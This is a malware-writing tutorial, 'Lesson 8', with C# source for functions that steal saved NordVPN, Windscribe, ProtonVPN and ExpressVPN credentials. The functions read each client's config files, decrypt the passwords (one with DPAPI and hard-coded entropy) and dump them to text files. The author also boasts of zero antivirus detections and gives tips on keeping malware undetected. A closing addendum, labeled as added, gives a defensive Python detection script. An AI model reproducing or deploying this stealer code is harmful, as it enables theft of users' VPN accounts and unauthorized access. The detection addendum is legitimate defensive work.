Lesson 8: Stealing VPN Accounts with Malware — Top 4 Popular + Source-Codes
Below is the Topics List for Lesson 8:
8. VPN Accounts Theft:
⇢ NordVPN
⇢ WindscribeVPN
⇢ ProtonVPN
more… (ExpressVPN)
Many people and companies use virtual private networks (VPNs) to safeguard their online security and privacy. Credentials for VPN accounts make excellent targets for attackers looking to access sensitive information without authorization. In this lesson, we’ll demonstrate how to add functionality that can steal VPN login information from well-known providers including NordVPN, WindscribeVPN, ProtonVPN, and more.
Topic 1: NordVPN
NordVPN is one of the most popular VPN services in the world. Using the below source-code you can write a function that can steal NordVPN credentials, allowing you to gain unauthorized access to VPN servers.
// nord
var nordVpnDir = new DirectoryInfo(Path.Combine(Paths.lappdata, "NordVPN"));
if (!nordVpnDir.Exists) return;
try
{
var accounts = new StringBuilder();
foreach (var nordVpnExeDir in nordVpnDir.GetDirectories("NordVpn.exe*"))
{
foreach (var vpnVersionDir in nordVpnExeDir.GetDirectories())
{
var userConfigPath = Path.Combine(vpnVersionDir.FullName, "user.config");
if (!File.Exists(userConfigPath)) continue;
var doc = new XmlDocument();
doc.Load(userConfigPath);
var encodedUsername = doc.SelectSingleNode("//setting[@name='Username']/value")?.InnerText;
var encodedPassword = doc.SelectSingleNode("//setting[@name='Password']/value")?.InnerText;
if (!string.IsNullOrEmpty(encodedUsername) && !string.IsNullOrEmpty(encodedPassword))
{
var username = Decrypt(encodedUsername);
var password = Decrypt(encodedPassword);
accounts.AppendLine($"Username: {username}\nPassword: {password}\n");
}
}
}
if (accounts.Length > 0)
{
var outputPath = Path.Combine(Directory.GetCurrentDirectory(), "nord.txt");
File.WriteAllText(outputPath, accounts.ToString());
}
}
catch
{
// Handle exceptions here
}
Topic 2: WindscribeVPN
WindscribeVPN is another popular VPN service that offers both free and paid plans. Using the below source-code you can write a function that can steal WindscribeVPN credentials, giving you access to sensitive data protected by VPN.
// windscribe
var windscribeDir = new DirectoryInfo(Path.Combine(Paths.lappdata, "Windscribe"));
if (!windscribeDir.Exists) return;
try
{
var accounts = new StringBuilder();
foreach (var accountFile in windscribeDir.GetFiles("OpenVPN_Configurations.xml", SearchOption.AllDirectories))
{
var doc = new XmlDocument();
doc.Load(accountFile.FullName);
var encodedUsername = doc.SelectSingleNode("//Configuration/UserInformation/Username")?.InnerText;
var encodedPassword = doc.SelectSingleNode("//Configuration/UserInformation/Password")?.InnerText;
if (!string.IsNullOrEmpty(encodedUsername) && !string.IsNullOrEmpty(encodedPassword))
{
var username = Decrypt(encodedUsername);
var password = Decrypt(encodedPassword);
accounts.AppendLine($"Username: {username}\nPassword: {password}\n");
}
}
if (accounts.Length > 0)
{
var outputPath = Path.Combine(Directory.GetCurrentDirectory(), "windscribe.txt");
File.WriteAllText(outputPath, accounts.ToString());
}
}
catch
{
// Handle exceptions here
}
Topic 3: ProtonVPN
ProtonVPN is a popular VPN service that emphasizes security and privacy. Using the below source-code you can write a function that can steal ProtonVPN credentials, allowing you to bypass its strong encryption and gain access to protected data.
// proton
var protonDir = new DirectoryInfo(Path.Combine(Paths.lappdata, "ProtonVPN"));
if (!protonDir.Exists) return;
try
{
var accounts = new StringBuilder();
foreach (var accountFile in protonDir.GetFiles("Accounts.xml", SearchOption.AllDirectories))
{
var doc = XDocument.Load(accountFile.FullName);
var accountsElement = doc.Descendants("Accounts").FirstOrDefault();
if (accountsElement != null)
{
foreach (var accountElement in accountsElement.Descendants("Account"))
{
var username = accountElement.Element("Username")?.Value;
var encodedPassword = accountElement.Element("Password")?.Value;
if (!string.IsNullOrEmpty(username) && !string.IsNullOrEmpty(encodedPassword))
{
var password = Decrypt(encodedPassword);
accounts.AppendLine($"Username: {username}\nPassword: {password}\n");
}
}
}
}
if (accounts.Length > 0)
{
var outputPath = Path.Combine(Directory.GetCurrentDirectory(), "proton.txt");
File.WriteAllText(outputPath, accounts.ToString());
}
}
catch
{
// Handle exceptions here
}
Topic 4: More VPN Services
Beyond NordVPN, WindscribeVPN, and ProtonVPN, there are many other VPN services with valuable credentials. Using the below source-code you can write a function that can steal credentials from other VPN services, giving you access to even more sensitive data.
A) ExpressVPN
private static readonly byte[] Entropy = { 0x50, 0x44, 0x46, 0x6d, 0x6d, 0x4d, 0x44, 0x5f, 0x7b, 0x40, 0x26, 0x7b, 0x34, 0x2b, 0x3d, 0x50, 0x3a, 0x3f, 0x49, 0x20, 0x26, 0x20, 0x5f, 0x23, 0x21, 0x40, 0x2e, 0x23, 0x27, 0x20, 0x2f };
private static string Decrypt(string encodedData)
{
try
{
var protectedData = Convert.FromBase64String(encodedData);
var unprotectedData = ProtectedData.Unprotect(protectedData, Entropy, DataProtectionScope.CurrentUser);
return Encoding.UTF8.GetString(unprotectedData);
}
catch
{
return "";
}
}
public static void Express_XITstealer()
{
var expressDir = new DirectoryInfo(Path.Combine(Paths.lappdata, "ExpressVPN"));
if (!expressDir.Exists) return;
try
{
var accounts = new StringBuilder();
foreach (var accountFile in expressDir.GetFiles("settings.xml", SearchOption.AllDirectories))
{
var doc = XDocument.Load(accountFile.FullName);
var accountsElement = doc.Descendants("UserConfig").FirstOrDefault()?.Element("AccountSettings");
if (accountsElement != null)
{
foreach (var accountElement in accountsElement.Descendants("Account"))
{
var username = accountElement.Element("Email")?.Value;
var encodedPassword = accountElement.Element("Password")?.Value;
if (!string.IsNullOrEmpty(username) && !string.IsNullOrEmpty(encodedPassword))
{
var password = Decrypt(encodedPassword);
accounts.AppendLine($"Username: {username}\nPassword: {password}\n");
}
}
}
}
if (accounts.Length > 0)
{
var outputPath = Path.Combine(Directory.GetCurrentDirectory(), "express.txt");
File.WriteAllText(outputPath, accounts.ToString());
}
}
catch
{
// Handle exceptions here
}
}
Finally, I compiled all the topics of lesson 8 & it was detected by 0 out of 26 antivirus scans. Below is the antivirus scan report from antiscan.me:
Remember: Don’t share your unencrypted assemblies or malware source with random antivirus scanners; use only those which are listed in the article given below to keep your malware undetected forever:
Conclusion
For attackers looking to get unauthorised access to sensitive information, stealing VPN account credentials is a powerful weapon. This class explained how to create malware that may be used to steal login information from well-known VPN providers including NordVPN, WindscribeVPN, and ProtonVPN. With this information, you may create malware programmes that are more effective and keep up with the most recent cybersecurity threats. Stay tuned for our next lesson, where we’ll explore how to add a function to steal offline crypto wallets and take full control of a user’s offline crypto wallet.
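Seen from the defender's side, the four routines in this lesson share one observable pattern: a process that is not the VPN client reads a credential file under the local application data folder (Paths.lappdata in the code, assumed here to be %LOCALAPPDATA%) and then writes a fixed-name text file. The following added example, which is not part of the original lesson, triages file-access telemetry for that pattern; the event tuple layout, the sample paths and the Program Files allowlist are assumptions.

```python
import ntpath
import re

# Folder and file names below are the ones the lesson's code reads and writes.
VPN_DIRS = {"nordvpn", "windscribe", "protonvpn", "expressvpn"}
STORE_FILES = {"user.config", "openvpn_configurations.xml", "accounts.xml", "settings.xml"}
DROP_FILES = {"nord.txt", "windscribe.txt", "proton.txt", "express.txt"}
LOCAL_APPDATA = re.compile(r"\\appdata\\local\\([^\\]+)\\", re.IGNORECASE)

def store_product(action, image, target):
    """Return the VPN product whose store a foreign process read, else None."""
    match = LOCAL_APPDATA.search(target.lower())
    if action != "read" or not match or match.group(1) not in VPN_DIRS:
        return None
    if ntpath.basename(target).lower() not in STORE_FILES:
        return None
    # Assumption: the genuine client runs from Program Files; check the signer in production.
    image = image.lower()
    if image.startswith("c:\\program files\\") and match.group(1) in image:
        return None
    return match.group(1)

def triage(events):
    """Map each suspicious process image to products read, drop files, severity."""
    seen = {}
    for action, image, target in events:
        entry = seen.setdefault(image, {"products": set(), "drops": set()})
        product = store_product(action, image, target)
        name = ntpath.basename(target).lower()
        if product:
            entry["products"].add(product)
        elif action == "create" and name in DROP_FILES:
            entry["drops"].add(name)
    findings = {}
    for image, entry in seen.items():
        if entry["products"]:
            bulk = len(entry["products"]) > 1 or bool(entry["drops"])
            findings[image] = {**entry, "severity": "high" if bulk else "medium"}
    return findings

# Constructed sample telemetry (not real logs): (action, process image, target).
HOME = "C:\\Users\\alice"
SAMPLE_EVENTS = [
    ("read", "C:\\Program Files\\NordVPN\\NordVPN.exe", HOME + "\\AppData\\Local\\NordVPN\\NordVPN.exe_Url_x\\1.0\\user.config"),
    ("read", HOME + "\\Downloads\\invoice.exe", HOME + "\\AppData\\Local\\NordVPN\\NordVPN.exe_Url_x\\1.0\\user.config"),
    ("read", HOME + "\\Downloads\\invoice.exe", HOME + "\\AppData\\Local\\ProtonVPN\\Accounts.xml"),
    ("create", HOME + "\\Downloads\\invoice.exe", HOME + "\\Downloads\\nord.txt"),
    ("read", HOME + "\\Tools\\backup.exe", HOME + "\\AppData\\Local\\Windscribe\\OpenVPN_Configurations.xml"),
    ("create", "C:\\Windows\\notepad.exe", HOME + "\\Documents\\nord.txt"),
]
```

A single store read by an unknown process is rated medium because backup and sync tools do the same thing; reads across several VPN products, or a read followed by one of the fixed output file names, is rated high.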